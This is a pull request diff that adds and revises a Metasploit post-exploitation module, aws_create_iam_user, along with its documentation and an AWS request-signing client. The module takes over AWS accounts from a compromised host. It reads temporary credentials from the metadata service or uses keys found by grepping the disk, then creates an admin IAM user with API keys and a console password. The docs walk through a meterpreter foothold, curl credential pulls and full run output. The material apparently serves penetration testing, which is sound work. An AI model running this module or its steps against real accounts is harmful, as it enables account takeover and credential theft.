### PR TITLE
Creates an AWS IAM User from pwned AWS host

### DIFF
--- a/documentation/modules/post/multi/escalate/aws_create_iam_user.md
+++ b/documentation/modules/post/multi/escalate/aws_create_iam_user.md
@@ -65,8 +65,8 @@ aws_create_iam_user can be used to take over an AWS account given access to
 a host having 1). overly permissive instance profile/role, 2). API Access keys.
 Once a foothold is established, you can run the module to pull temporary
 access keys from the metadata service. If this fails, search the instance for
-API access keys, e.g., see ~/aws/credentals, and set `AccessKeyId`,
-`SecretAccessKey`, & `Token` (optional). 
+API access keys, e.g., see ~/.aws/credentials, and set `AccessKeyId`,
+`SecretAccessKey`, & `Token` (optional).
 
 ## Options
 
@@ -75,6 +75,8 @@ API access keys, e.g., see ~/aws/credentals, and set `AccessKeyId`,
 * `SecretAccessKey`: set this if you find access keys on the host and instance has no profile/privileges
 * `Token`: set this if you find access keys on the host and instance has no profile/privileges. This is optional as this signifies temporary keys, if you find these, these are most likely expired.
 * `Proxies`: depending on your environment, you may wan to proxy your calls to AWS.
+* `CREATE_API`: when true, creates API keys for this user
+* `CREATE_CONSOLE`: when true, creates a password for this user so that they can access the AWS console
 
 
 ### Establish a foothold

--- a/documentation/modules/post/multi/escalate/aws_create_iam_user.md
+++ b/documentation/modules/post/multi/escalate/aws_create_iam_user.md
@@ -5,6 +5,7 @@ accounts. Sure, it is fun enough to take over a single host, but you can own all
 hosts in the account if you simply create an admin user.
 
 ## Privileges
+
 This module depends on administrators being lazy and not using the least
 privileges possible. Only on rare cases should instances have the following
 privileges.
@@ -16,6 +17,7 @@ privileges.
 * iam:CreateAccessKey
 
 ## Establish a foothold
+
 You first need a foothold in AWS, e.g., here we use `sshexec` to get the
 foothold and launch a meterpreter session.
 

--- a/documentation/modules/post/multi/escalate/aws_create_iam_user.md
+++ b/documentation/modules/post/multi/escalate/aws_create_iam_user.md
@@ -106,7 +106,7 @@ msf post(aws_create_iam_user) > exploit
 msf post(aws_create_iam_user) > exit -y
 ```
 
-You can see that the API keys stored in loot. Want console access, use [aws_console](../../gather/aws_console.md)
+You can see the API keys stored in loot:
 
 ```
 $ cat ~/.msf4/loot/20161121175902_default_52.1.2.3_AKIA_881948.txt

--- a/documentation/modules/post/multi/escalate/aws_create_iam_user.md
+++ b/documentation/modules/post/multi/escalate/aws_create_iam_user.md
@@ -1,0 +1,113 @@
+# aws_create_iam_user
+
+aws_create_iam_user is a simple post module that can be used to take over AWS
+accounts. Sure, it is fun enough to take over a single host, but you can own all
+hosts in the account if you simply create an admin user.
+
+## Privileges
+This module depends on administrators being lazy and not using the least
+privileges possible. Only on rare cases should instances have the following
+privileges.
+
+* iam:CreateUser
+* iam:CreateGroup
+* iam:PutGroupPolicy
+* iam:AddUserToGroup
+* iam:CreateAccessKey
+
+## Establish a foothold
+You first need a foothold in AWS, e.g., here we use `sshexec` to get the
+foothold and launch a meterpreter session.
+
+```
+$ ./msfconsole
+...
+msf > use exploit/multi/ssh/sshexec
+msf exploit(sshexec) > set password some_user
+password => some_user
+msf exploit(sshexec) > set username some_user
+username => some_user
+msf exploit(sshexec) > set RHOST 192.168.1.2
+RHOST => 192.168.1.2
+msf exploit(sshexec) > set payload linux/x86/meterpreter/bind_tcp
+payload => linux/x86/meterpreter/bind_tcp
+msf exploit(sshexec) > exploit -j
+[*] Exploit running as background job.
+
+[*] Started bind handler
+msf exploit(sshexec) > [*] 192.168.1.2:22 - Sending stager...
+[*] Transmitting intermediate stager for over-sized stage...(105 bytes)
+[*] Command Stager progress -  42.09% done (306/727 bytes)
+[*] Command Stager progress - 100.00% done (727/727 bytes)
+[*] Sending stage (1495599 bytes) to 192.168.1.2
+[*] Meterpreter session 1 opened (192.168.1.1:33750 -> 192.168.1.2:4444) at 2016-11-21 17:58:42 +0000
+```
+
+We will be using session 1.
+
+```
+msf exploit(sshexec) > sessions
+
+Active sessions
+===============
+
+  Id  Type                   Information                                                                       Connection
+  --  ----                   -----------                                                                       ----------
+  1   meterpreter x86/linux  uid=50011, gid=50011, euid=50011, egid=50011, suid=50011, sgid=50011 @ ip-19-...  192.168.1.1:41634 -> 192.168.1.2:4444 (192.168.1.2)
+
+```
+
+## Create IAM User
+
+Now you can load `aws_create_iam_user` and specify a meterpreter sesssion,
+e.g., `SESSION 1`.
+
+```
+msf exploit(sshexec) > use auxiliary/admin/aws/aws_create_iam_user
+msf post(aws_create_iam_user) > set SESSION 1
+SESSION => 1
+msf post(aws_create_iam_user) > exploit
+
+[*] 169.254.169.254:80 - looking for creds...
+[*] Creating user: metasploit
+[*] iam.amazonaws.com:443 - Connecting (iam.amazonaws.com)...
+[!] Path: /
+[!] UserName: metasploit
+[!] Arn: arn:aws:iam::097986286576:user/metasploit
+[!] UserId: AIDA...
+[!] CreateDate: 2016-11-21T17:59:50.010Z
+[*] Creating group: metasploit
+[*] iam.amazonaws.com:443 - Connecting (iam.amazonaws.com)...
+[!] Path: /
+[!] GroupName: metasploit
+[!] Arn: arn:aws:iam::097986286576:group/metasploit
+[!] GroupId: AGPAIENI6YTM5JVRQ2452
+[!] CreateDate: 2016-11-21T17:59:50.554Z
+[*] Creating group policy: metasploit
+[*] iam.amazonaws.com:443 - Connecting (iam.amazonaws.com)...
+[!] xmlns: https://iam.amazonaws.com/doc/2010-05-08/
+[!] ResponseMetadata: {"RequestId"=>"4c43248-d314-1226-bedd-234234232"}
+[*] Adding user (metasploit) to group: metasploit
+[*] iam.amazonaws.com:443 - Connecting (iam.amazonaws.com)...
+[!] xmlns: https://iam.amazonaws.com/doc/2010-05-08/
+[!] ResponseMetadata: {"RequestId"=>"4c43248-d314-1226-bedd-234234232"}
+[*] Creating API Keys for metasploit
+[*] iam.amazonaws.com:443 - Connecting (iam.amazonaws.com)...
+[!] AccessKeyId: AKIA...
+[!] SecretAccessKey: THE SECRET ACCESS KEY...
+[!] AccessKeySelector: HMAC
+[!] UserName: metasploit
+[!] Status: Active
+[!] CreateDate: 2016-11-21T17:59:51.967Z
+[+] API keys stored at: /home/pwner/.msf4/loot/20161121175902_default_52.1.2.3_AKIA_881948.txt
+[*] Post module execution completed
+msf post(aws_create_iam_user) > exit -y
+```
+
+You can see that the API keys stored in loot. Want console access, use [aws_console](../../gather/aws_console.md)
+
+```
+$ cat ~/.msf4/loot/20161121175902_default_52.1.2.3_AKIA_881948.txt
+
+{"AccessKeyId":"AKIA...","SecretAccessKey":"THE SECRET ACCESS KEY...","AccessKeySelector":"HMAC","UserName":"metasploit","Status":"Active","CreateDate":"2016-11-21T17:59:51.967Z"}
+```

--- a/documentation/modules/post/multi/escalate/aws_create_iam_user.md
+++ b/documentation/modules/post/multi/escalate/aws_create_iam_user.md
@@ -4,11 +4,27 @@ aws_create_iam_user is a simple post module that can be used to take over AWS
 accounts. Sure, it is fun enough to take over a single host, but you can own all
 hosts in the account if you simply create an admin user.
 
+# Background
+
+## Instance Profiles
+
+An Instance Profile is an AWS construct that maps a role to a host (instance).
+Not all hosts have instance profiles and/or may have restricted privileges.
+AWS roles are composed of policies which specify API calls that the host is
+allowed to make.
+
 ## Privileges
 
 This module depends on administrators being lazy and not using the least
-privileges possible. Only on rare cases should instances have the following
-privileges.
+privileges possible. We often see instances assigned `*.*` roles that allow
+any user on the instance to make any API call including creating admin users.
+When this occours, a user with long lived credentials can be created and calls
+against the AWS API can be made from anywhere on the Internet. Once an account
+is taken over in this manner instances can be spun up, other users can be locked
+out, networks can be traversed, and many other dangeous things can happen.
+
+Only on rare cases should hosts have the following privileges, these should be
+restriced.
 
 * iam:CreateUser
 * iam:CreateGroup
@@ -16,7 +32,52 @@ privileges.
 * iam:AddUserToGroup
 * iam:CreateAccessKey
 
-## Establish a foothold
+This module will attempt all API calls listed above in sequence. Account takeover
+may succeed even if intermediate API calls fail. E.g., we may not be able to
+create a new user, but we may be able to create access keys for an existing user.
+
+## Metadata Service
+
+The metadata service is a mechanism the AWS hypervisor employs to pass
+information down into hosts. Any AWS host can retrieve information about itself
+and its environemtn by curling http://169.254.169.254/. This mechanism is also
+used to pass temporary credentials to a host. This module pulls these temporary
+credentials and attempts to create a user with admin privileges.
+
+To manually check that a host has an instance profile you can simply curl the
+metadata service like so:
+
+```
+$ curl http://169.254.169.254/latest/meta-data/iam/security-credentials/
+SOME_ROLE_NAME
+$ curl http://169.254.169.254/latest/meta-data/iam/security-credentials/SOME_ROLE_NAME
+{
+  "Code" : "Success",
+  "LastUpdated" : "2016-12-07T18:36:48Z",
+  "Type" : "AWS-HMAC",
+  "AccessKeyId" : "ASIA
+  ...
+```
+
+# Usage
+
+aws_create_iam_user can be used to take over an AWS account given access to
+a host having 1). overly permissive instance profile/role, 2). API Access keys.
+Once a foothold is established, you can run the module to pull temporary
+access keys from the metadata service. If this fails, search the instance for
+API access keys, e.g., see ~/aws/credentals, and set `AccessKeyId`,
+`SecretAccessKey`, & `Token` (optional). 
+
+## Options
+
+* `IAM_USERNAME`: set this if you would like to control the username for to user to be created
+* `AccessKeyId`: set this if you find access keys on the host and instance has no profile/privileges
+* `SecretAccessKey`: set this if you find access keys on the host and instance has no profile/privileges
+* `Token`: set this if you find access keys on the host and instance has no profile/privileges. This is optional as this signifies temporary keys, if you find these, these are most likely expired.
+* `Proxies`: depending on your environment, you may wan to proxy your calls to AWS.
+
+
+### Establish a foothold
 
 You first need a foothold in AWS, e.g., here we use `sshexec` to get the
 foothold and launch a meterpreter session.
@@ -59,10 +120,12 @@ Active sessions
 
 ```
 
-## Create IAM User
+## Overly Permissive Instance Profile
 
-Now you can load `aws_create_iam_user` and specify a meterpreter sesssion,
-e.g., `SESSION 1`.
+Here we are assuming that we have taken over a host having an instance profile with
+overly permissive access. Once a session is established, we can load
+`aws_create_iam_user` and specify a meterpreter sesssion,
+e.g., `SESSION 1` and run the exploit.
 
 ```
 msf exploit(sshexec) > use auxiliary/admin/aws/aws_create_iam_user
@@ -70,41 +133,78 @@ msf post(aws_create_iam_user) > set SESSION 1
 SESSION => 1
 msf post(aws_create_iam_user) > exploit
 
-[*] 169.254.169.254:80 - looking for creds...
-[*] Creating user: metasploit
-[*] iam.amazonaws.com:443 - Connecting (iam.amazonaws.com)...
-[!] Path: /
-[!] UserName: metasploit
-[!] Arn: arn:aws:iam::097986286576:user/metasploit
-[!] UserId: AIDA...
-[!] CreateDate: 2016-11-21T17:59:50.010Z
-[*] Creating group: metasploit
-[*] iam.amazonaws.com:443 - Connecting (iam.amazonaws.com)...
-[!] Path: /
-[!] GroupName: metasploit
-[!] Arn: arn:aws:iam::097986286576:group/metasploit
-[!] GroupId: AGPAIENI6YTM5JVRQ2452
-[!] CreateDate: 2016-11-21T17:59:50.554Z
-[*] Creating group policy: metasploit
-[*] iam.amazonaws.com:443 - Connecting (iam.amazonaws.com)...
-[!] xmlns: https://iam.amazonaws.com/doc/2010-05-08/
-[!] ResponseMetadata: {"RequestId"=>"4c43248-d314-1226-bedd-234234232"}
-[*] Adding user (metasploit) to group: metasploit
-[*] iam.amazonaws.com:443 - Connecting (iam.amazonaws.com)...
-[!] xmlns: https://iam.amazonaws.com/doc/2010-05-08/
-[!] ResponseMetadata: {"RequestId"=>"4c43248-d314-1226-bedd-234234232"}
-[*] Creating API Keys for metasploit
-[*] iam.amazonaws.com:443 - Connecting (iam.amazonaws.com)...
-[!] AccessKeyId: AKIA...
-[!] SecretAccessKey: THE SECRET ACCESS KEY...
-[!] AccessKeySelector: HMAC
-[!] UserName: metasploit
-[!] Status: Active
-[!] CreateDate: 2016-11-21T17:59:51.967Z
+[*] 169.254.169.254 - looking for creds...
+[*] Creating user: J2XXox11WW4brAcb
+[*] Connecting (iam.amazonaws.com)...
+[*] Creating group: J2XXox11WW4brAcb
+[*] Connecting (iam.amazonaws.com)...
+[*] Creating group policy: J2XXox11WW4brAcb
+[*] Connecting (iam.amazonaws.com)...
+[*] Adding user (J2XXox11WW4brAcb) to group: J2XXox11WW4brAcb
+[*] Connecting (iam.amazonaws.com)...
+[*] Creating API Keys for J2XXox11WW4brAcb
+[*] Connecting (iam.amazonaws.com)...
 [+] API keys stored at: /home/pwner/.msf4/loot/20161121175902_default_52.1.2.3_AKIA_881948.txt
 [*] Post module execution completed
-msf post(aws_create_iam_user) > exit -y
 ```
+
+If the host does not have an instance profile or the right access, the output will look like so:
+
+```
+[*] 169.254.169.254 - looking for creds...
+[*] Creating user: 3SFFML3ucP1AyP7J
+[*] Connecting (iam.amazonaws.com)...
+[-] User: arn:aws:sts::097986286576:assumed-role/msftest/i-abacadab is not authorized to perform: iam:CreateUser on resource: arn:aws:iam::097986286576:user/3SFFML3ucP1AyP7J
+[*] Creating group: 3SFFML3ucP1AyP7J
+[*] Connecting (iam.amazonaws.com)...
+[-] User: arn:aws:sts::097986286576:assumed-role/msftest/i-abacadab is not authorized to perform: iam:CreateGroup on resource: arn:aws:iam::097986286576:group/3SFFML3ucP1AyP7J
+[*] Creating group policy: 3SFFML3ucP1AyP7J
+[*] Connecting (iam.amazonaws.com)...
+[-] User: arn:aws:sts::097986286576:assumed-role/msftest/i-abacadab is not authorized to perform: iam:PutGroupPolicy on resource: group 3SFFML3ucP1AyP7J
+[*] Adding user (3SFFML3ucP1AyP7J) to group: 3SFFML3ucP1AyP7J
+[*] Connecting (iam.amazonaws.com)...
+[-] User: arn:aws:sts::097986286576:assumed-role/msftest/i-abacadab is not authorized to perform: iam:AddUserToGroup on resource: group 3SFFML3ucP1AyP7J
+[*] Creating API Keys for 3SFFML3ucP1AyP7J
+[*] Connecting (iam.amazonaws.com)...
+[-] User: arn:aws:sts::097986286576:assumed-role/msftest/i-abacadab is not authorized to perform: iam:CreateAccessKey on resource: user 3SFFML3ucP1AyP7J
+[*] Post module execution completed
+```
+
+## API Access Keys
+
+In the case that the host we have taken over has no instance profile or does not
+have the required privileges, we can search the host for access keys with
+something like `grep -r AKIA /`. These keys may have admin privileges at which
+point you own the account, if not we may be able to escalate privileges.
+We can set `AccessKeyId`, `SecretAccessKey`, & `Token` (optional) and rerun
+the exploit to test this possibility.
+
+```
+msf exploit(sshexec) > use auxiliary/admin/aws/aws_create_iam_user
+msf post(aws_create_iam_user) > set AccessKeyId AKIAAKIAAKIAAKIAAKIA
+AccessKeyId => AKIAAKIAAKIAAKIAAKIA
+msf post(aws_create_iam_user) > set SecretAccessKey jhsdlfjkhalkjdfhalskdhfjalsjkakhksdfhlah
+SecretAccessKey => jhsdlfjkhalkjdfhalskdhfjalsjkakhksdfhlah
+msf post(aws_create_iam_user) > set SESSION 1
+SESSION => 1
+msf post(aws_create_iam_user) > run
+
+[*] 169.254.169.254 - looking for creds...
+[*] Creating user: NyTDbU9v6LzzCLXq
+[*] Connecting (iam.amazonaws.com)...
+[*] Creating group: NyTDbU9v6LzzCLXq
+[*] Connecting (iam.amazonaws.com)...
+[*] Creating group policy: NyTDbU9v6LzzCLXq
+[*] Connecting (iam.amazonaws.com)...
+[*] Adding user (NyTDbU9v6LzzCLXq) to group: NyTDbU9v6LzzCLXq
+[*] Connecting (iam.amazonaws.com)...
+[*] Creating API Keys for NyTDbU9v6LzzCLXq
+[*] Connecting (iam.amazonaws.com)...
+[+] API keys stored at: /home/pwner/.msf4/loot/20161121175902_default_52.1.2.3_AKIA_881948.txt
+[*] Post module execution completed
+```
+
+## Loot
 
 You can see the API keys stored in loot:
 

--- a/lib/metasploit/framework/aws/client.rb
+++ b/lib/metasploit/framework/aws/client.rb
@@ -86,7 +86,7 @@ module Metasploit
           pstr
         end
 
-        def headers(creds, service, body_digest, body_length, now = nil)
+        def headers(creds, service, body_digest, now = nil)
           now = Time.now.utc.strftime("%Y%m%dT%H%M%SZ") if now.nil?
           headers = {
             'Content-Type' => 'application/x-www-form-urlencoded; charset=utf-8',
@@ -140,7 +140,7 @@ module Metasploit
         end
 
         def call_api(creds, service, api_params)
-          print_status("#{peer} - Connecting (#{datastore['RHOST']})...")
+          print_status("Connecting (#{datastore['RHOST']})...")
           body = body(api_params)
           body_length = body.length
           body_digest = hexdigest(body)
@@ -148,7 +148,7 @@ module Metasploit
             res = send_request_raw(
               'method' => 'POST',
               'data' => body,
-              'headers' => headers(creds, service, body_digest, body_length)
+              'headers' => headers(creds, service, body_digest)
             )
             if res.nil?
               print_error "#{peer} did not respond"

--- a/lib/metasploit/framework/aws/client.rb
+++ b/lib/metasploit/framework/aws/client.rb
@@ -107,7 +107,7 @@ module Metasploit
         def print_hsh(hsh)
           return if hsh.nil? || !hsh.instance_of?(Hash)
           hsh.each do |key, value|
-            print_warning "#{key}: #{value}"
+            vprint_status "#{key}: #{value}"
           end
         end
 

--- a/lib/metasploit/framework/aws/client.rb
+++ b/lib/metasploit/framework/aws/client.rb
@@ -1,0 +1,179 @@
+require 'openssl'
+
+module Metasploit
+  module Framework
+    module Aws
+      module Client
+        include Msf::Exploit::Remote::HttpClient
+        def register_autofilter_ports(ports=[]); end
+        def register_autofilter_hosts(ports=[]); end
+        def register_autofilter_services(services=[]); end
+
+        def metadata_creds
+          # TODO: do it for windows/generic way
+          cmd_out = cmd_exec("curl --version")
+          if cmd_out =~ /^curl \d/
+            url = "http://#{datastore['METADATA_IP']}/2012-01-12/meta-data/"
+            print_status("#{datastore['METADATA_IP']} - looking for creds...")
+            resp = cmd_exec("curl #{url}")
+            if resp =~ /^iam.*/
+              resp = cmd_exec("curl #{url}iam/")
+              if resp =~ /^security-credentials.*/
+                resp = cmd_exec("curl #{url}iam/security-credentials/")
+                return JSON.parse(cmd_exec("curl #{url}iam/security-credentials/#{resp}"))
+              end
+            end
+          else
+            print_error cmd_out
+          end
+          {}
+        end
+
+        def hexdigest(value)
+          digest = OpenSSL::Digest::SHA256.new
+          if value.respond_to?(:read)
+            chunk = nil
+            chunk_size = 1024 * 1024 # 1 megabyte
+            digest.update(chunk) while chunk = value.read(chunk_size)
+            value.rewind
+          else
+            digest.update(value)
+          end
+          digest.hexdigest
+        end
+
+        def hmac(key, value)
+          OpenSSL::HMAC.digest(OpenSSL::Digest.new('sha256'), key, value)
+        end
+
+        def hexhmac(key, value)
+          OpenSSL::HMAC.hexdigest(OpenSSL::Digest.new('sha256'), key, value)
+        end
+
+
+        def request_to_sign(headers, body_digest)
+          headers_block = headers.sort_by(&:first).map do |k,v|
+            v = "#{v},#{v}" if k == 'Host'
+            "#{k.downcase}:#{v}"
+          end.join("\n")
+          headers_list = headers.keys.sort.map(&:downcase).join(';')
+          flat_request = [ "POST", "/", '', headers_block + "\n", headers_list, body_digest].join("\n")
+          [headers_list, flat_request]
+        end
+
+
+        def sign(creds, service, headers, body_digest, now)
+          date_mac = hmac("AWS4" + creds['SecretAccessKey'], now[0, 8])
+          region_mac = hmac(date_mac, datastore['Region'])
+          service_mac = hmac(region_mac, service)
+          credentials_mac = hmac(service_mac, 'aws4_request')
+          headers_list, flat_request = request_to_sign(headers, body_digest)
+          doc = "AWS4-HMAC-SHA256\n#{now}\n#{now[0, 8]}/#{datastore['Region']}/#{service}/aws4_request\n#{hexdigest(flat_request)}"
+
+          signature = hexhmac(credentials_mac, doc)
+          [headers_list, signature]
+        end
+
+        def auth(creds, service, headers, body_digest, now)
+          headers_list, signature = sign(creds, service, headers, body_digest, now)
+          "AWS4-HMAC-SHA256 Credential=#{creds['AccessKeyId']}/#{now[0, 8]}/#{datastore['Region']}/#{service}/aws4_request, SignedHeaders=#{headers_list}, Signature=#{signature}"
+        end
+
+        def body(vars_post)
+          pstr = ""
+          vars_post.each_pair do |var,val|
+            pstr << '&' if pstr.length > 0
+            pstr << var
+            pstr << '='
+            pstr << val
+          end
+          pstr
+        end
+
+        def headers(creds, service, body_digest, body_length)
+          now = Time.now.utc.strftime("%Y%m%dT%H%M%SZ")
+          headers = {
+            'Content-Type' => 'application/x-www-form-urlencoded; charset=utf-8',
+            'Accept-Encoding' => '',
+            'User-Agent' => "aws-sdk-ruby2/2.6.27 ruby/2.3.2 x86_64-darwin15",
+            'X-Amz-Date' => now,
+            'Host' => datastore['RHOST'],
+            'X-Amz-Content-Sha256' => body_digest,
+            'Accept' => '*/*'
+          }
+          headers['X-Amz-Security-Token'] = creds['Token'] if creds['Token']
+          sign_headers = ['Content-Type', 'Host', 'User-Agent', 'X-Amz-Content-Sha256', 'X-Amz-Date']
+          auth_headers = headers.select { |k, _| sign_headers.include?(k) }
+          headers['Authorization'] = auth(creds, service, auth_headers, body_digest, now)
+          headers
+        end
+
+        def print_hsh(hsh)
+          hsh.each do |key, value|
+            print_warning "#{key}: #{value}"
+          end
+        end
+
+        def print_results(doc, action)
+          response = "#{action}Response"
+          result = "#{action}Result"
+          resource = /[A-Z][a-z]+([A-Za-z]+)/.match(action)[1]
+
+          if doc["ErrorResponse"] && doc["ErrorResponse"]["Error"]
+            print_error doc["ErrorResponse"]["Error"]["Message"]
+            return nil
+          end
+
+          idoc = doc[response] if doc[response]
+          idoc = idoc[result] if idoc[result]
+          idoc = idoc[resource] if idoc[resource]
+
+          if idoc["member"]
+            idoc["member"].each do |x|
+              print_hsh x
+            end
+          else
+            print_hsh idoc
+          end
+          idoc
+        end
+
+        def call_api(creds, service, api_params)
+          print_status("#{peer} - Connecting (#{datastore['RHOST']})...")
+          body = body(api_params)
+          body_length = body.length
+          body_digest = hexdigest(body)
+          begin
+            res = send_request_raw(
+              'method' => 'POST',
+              'data' => body,
+              'headers' => headers(creds, service, body_digest, body_length)
+            )
+            if res.nil?
+              print_error "#{peer} did not respond"
+            else
+              Hash.from_xml(res.body)
+            end
+          rescue => e
+            print_error e.message
+          end
+        end
+
+        def call_iam(creds, api_params)
+          api_params['Version'] = '2010-05-08' unless api_params['Version']
+          call_api(creds, 'iam', api_params)
+        end
+
+        def call_ec2(creds, api_params)
+          api_params['Version'] = '2015-10-01' unless api_params['Version']
+          call_api(creds, 'ec2', api_params)
+        end
+
+        def call_sts(creds, api_params)
+          api_params['Version'] = '2011-06-15' unless api_params['Version']
+          call_api(creds, 'sts', api_params)
+        end
+      end
+    end
+  end
+end

--- a/lib/metasploit/framework/aws/client.rb
+++ b/lib/metasploit/framework/aws/client.rb
@@ -9,26 +9,6 @@ module Metasploit
         def register_autofilter_hosts(ports=[]); end
         def register_autofilter_services(services=[]); end
 
-        def metadata_creds
-          # TODO: do it for windows/generic way
-          cmd_out = cmd_exec("curl --version")
-          if cmd_out =~ /^curl \d/
-            url = "http://#{datastore['METADATA_IP']}/2012-01-12/meta-data/"
-            print_status("#{datastore['METADATA_IP']} - looking for creds...")
-            resp = cmd_exec("curl #{url}")
-            if resp =~ /^iam.*/
-              resp = cmd_exec("curl #{url}iam/")
-              if resp =~ /^security-credentials.*/
-                resp = cmd_exec("curl #{url}iam/security-credentials/")
-                return JSON.parse(cmd_exec("curl #{url}iam/security-credentials/#{resp}"))
-              end
-            end
-          else
-            print_error cmd_out
-          end
-          {}
-        end
-
         def hexdigest(value)
           digest = OpenSSL::Digest::SHA256.new
           if value.respond_to?(:read)

--- a/lib/metasploit/framework/aws/client.rb
+++ b/lib/metasploit/framework/aws/client.rb
@@ -140,7 +140,7 @@ module Metasploit
         end
 
         def call_api(creds, service, api_params)
-          print_status("Connecting (#{datastore['RHOST']})...")
+          vprint_status("Connecting (#{datastore['RHOST']})...")
           body = body(api_params)
           body_length = body.length
           body_digest = hexdigest(body)

--- a/lib/metasploit/framework/aws/client.rb
+++ b/lib/metasploit/framework/aws/client.rb
@@ -6,6 +6,7 @@ module Metasploit
       module Client
         USER_AGENT = "aws-sdk-ruby2/2.6.27 ruby/2.3.2 x86_64-darwin15"
         include Msf::Exploit::Remote::HttpClient
+
         # because Post modules require these to be defined when including HttpClient
         def register_autofilter_ports(ports=[]); end
         def register_autofilter_hosts(ports=[]); end
@@ -48,7 +49,7 @@ module Metasploit
           if headers.nil? || !headers.instance_of?(Hash) || body_digest.nil? || !body_digest.instance_of?(String)
             return nil, nil
           end
-          headers_block = headers.sort_by(&:first).map do |k,v|
+          headers_block = headers.sort_by(&:first).map do |k, v|
             v = "#{v},#{v}" if k == 'Host'
             "#{k.downcase}:#{v}"
           end.join("\n")
@@ -76,8 +77,8 @@ module Metasploit
 
         def body(vars_post)
           pstr = ""
-          vars_post.each_pair do |var,val|
-            pstr << '&' if pstr.length > 0
+          vars_post.each_pair do |var, val|
+            pstr << '&' unless pstr.empty?
             pstr << var
             pstr << '='
             pstr << val

--- a/modules/post/multi/escalate/aws_create_iam_user.rb
+++ b/modules/post/multi/escalate/aws_create_iam_user.rb
@@ -22,7 +22,10 @@ class MetasploitModule < Msf::Post
         'License'        => MSF_LICENSE,
         'Platform'       => %w(unix),
         'SessionTypes'   => %w(shell meterpreter),
-        'Author'         => ['Javier Godinez <godinezj[at]gmail.com>'],
+        'Author'         => [
+          'Javier Godinez <godinezj[at]gmail.com>',
+          'Jon Hart <jon_hart@rapid7.com>'
+        ],
         'References'     => [
           [ 'URL', 'https://github.com/devsecops/bootcamp/raw/master/Week-6/slides/june-DSO-bootcamp-week-six-lesson-three.pdf' ]
         ]
@@ -32,6 +35,8 @@ class MetasploitModule < Msf::Post
     register_options(
       [
         OptString.new('IAM_USERNAME', [false, 'Name of the user to be created (leave empty or unset to use a random name)', '']),
+        OptBool.new('CREATE_API', [true, 'Add access key ID and secret access key to account (API, CLI, and SDK access)', true]),
+        OptBool.new('CREATE_CONSOLE', [true, 'Create an account with a password for accessing the AWS management console', true]),
         OptString.new('AccessKeyId', [false, 'AWS access key', '']),
         OptString.new('SecretAccessKey', [false, 'AWS secret key', '']),
         OptString.new('Token', [false, 'AWS session token', ''])
@@ -50,6 +55,12 @@ class MetasploitModule < Msf::Post
     deregister_options('VHOST')
   end
 
+  def setup
+    if !(datastore['CREATE_API'] || datastore['CREATE_CONSOLE'])
+      fail_with(Failure::BadConfig, "Must set one or both of CREATE_API and CREATE_CONSOLE")
+    end
+  end
+
   def run
     # setup creds for making IAM API calls
     creds = metadata_creds
@@ -66,41 +77,82 @@ class MetasploitModule < Msf::Post
       creds['Token'] = datastore['Token'] unless datastore['Token'].blank?
     end
 
+    results = {}
+
     # create user
     username = datastore['IAM_USERNAME'].blank? ? Rex::Text.rand_text_alphanumeric(16) : datastore['IAM_USERNAME']
     print_status("Creating user: #{username}")
     action = 'CreateUser'
     doc = call_iam(creds, 'Action' => action, 'UserName' => username)
     print_results(doc, action)
+    results['UserName'] = username
 
     # create group
-    print_status("Creating group: #{username}")
+    groupname = username
+    print_status("Creating group: #{groupname}")
     action = 'CreateGroup'
-    doc = call_iam(creds, 'Action' => action, 'GroupName' => username)
+    doc = call_iam(creds, 'Action' => action, 'GroupName' => groupname)
     print_results(doc, action)
+    results['GroupName'] = groupname
 
     # create group policy
-    print_status("Creating group policy: #{username}")
+    policyname = username
+    print_status("Creating group policy: #{policyname}")
     pol_doc = datastore['IAM_GROUP_POL']
     action = 'PutGroupPolicy'
-    doc = call_iam(creds, 'Action' => action, 'GroupName' => username, 'PolicyName' => username, 'PolicyDocument' => URI.encode(pol_doc))
+    doc = call_iam(creds, 'Action' => action, 'GroupName' => groupname, 'PolicyName' => policyname, 'PolicyDocument' => URI.encode(pol_doc))
     print_results(doc, action)
 
     # add user to group
-    print_status("Adding user (#{username}) to group: #{username}")
+    print_status("Adding user (#{username}) to group: #{groupname}")
     action = 'AddUserToGroup'
-    doc = call_iam(creds, 'Action' => action, 'UserName' => username, 'GroupName' => username)
+    doc = call_iam(creds, 'Action' => action, 'UserName' => username, 'GroupName' => groupname)
     print_results(doc, action)
 
-    # create API keys
-    print_status("Creating API Keys for #{username}")
-    action = 'CreateAccessKey'
-    doc = call_iam(creds, 'Action' => action, 'UserName' => username)
-    doc = print_results(doc, action)
 
-    return if doc.nil?
-    path = store_loot(doc['AccessKeyId'], 'text/plain', datastore['RHOST'], doc.to_json)
-    print_good("API keys stored at: " + path)
+    if datastore['CREATE_API']
+      # create API keys
+      print_status("Creating API Keys for #{username}")
+      action = 'CreateAccessKey'
+      response = call_iam(creds, 'Action' => action, 'UserName' => username)
+      doc = print_results(response, action)
+      results['SecretAccessKey'] = doc['SecretAccessKey']
+      results['AccessKeyId'] = doc['AccessKeyId']
+    end
+
+    if datastore['CREATE_CONSOLE']
+      print_status("Creating password for #{username}")
+      password = username
+      action = 'CreateLoginProfile'
+      response = call_iam(creds, 'Action' => action, 'UserName' => username, 'Password' => password)
+      doc = print_results(response, action)
+      results['Password'] = password
+    end
+
+    action = 'GetUser'
+    response = call_iam(creds, 'Action' => action, 'UserName' => username)
+    doc = print_results(response, action)
+    arn = doc['Arn']
+    results['AccountId'] = arn[/^arn:aws:iam::(\d+):/,1]
+
+    keys = results.keys
+    table = Rex::Text::Table.new(
+      'Header' => "AWS Account Information",
+      'Columns' => keys
+    )
+    table << results.values
+    print_line(table.to_s)
+
+    if results.key?('AccessKeyId')
+      print_good("AWS CLI/SDK etc can be accessed by configuring with the above listed values")
+    end
+
+    if results.key?('Password')
+      print_good("AWS console URL https://#{results['AccountId']}.signin.aws.amazon.com/console may be used to access this account")
+    end
+
+    path = store_loot('what', 'text/plain', datastore['RHOST'], results.to_json)
+    print_good("AWS loot stored at: " + path)
   end
 
   def metadata_creds

--- a/modules/post/multi/escalate/aws_create_iam_user.rb
+++ b/modules/post/multi/escalate/aws_create_iam_user.rb
@@ -151,7 +151,7 @@ class MetasploitModule < Msf::Post
       print_good("AWS console URL https://#{results['AccountId']}.signin.aws.amazon.com/console may be used to access this account")
     end
 
-    path = store_loot('what', 'text/plain', datastore['RHOST'], results.to_json)
+    path = store_loot('AWS credentials', 'text/json', session, results.to_json)
     print_good("AWS loot stored at: " + path)
   end
 

--- a/modules/post/multi/escalate/aws_create_iam_user.rb
+++ b/modules/post/multi/escalate/aws_create_iam_user.rb
@@ -23,7 +23,6 @@ class MetasploitModule < Msf::Post
 
     register_options(
       [
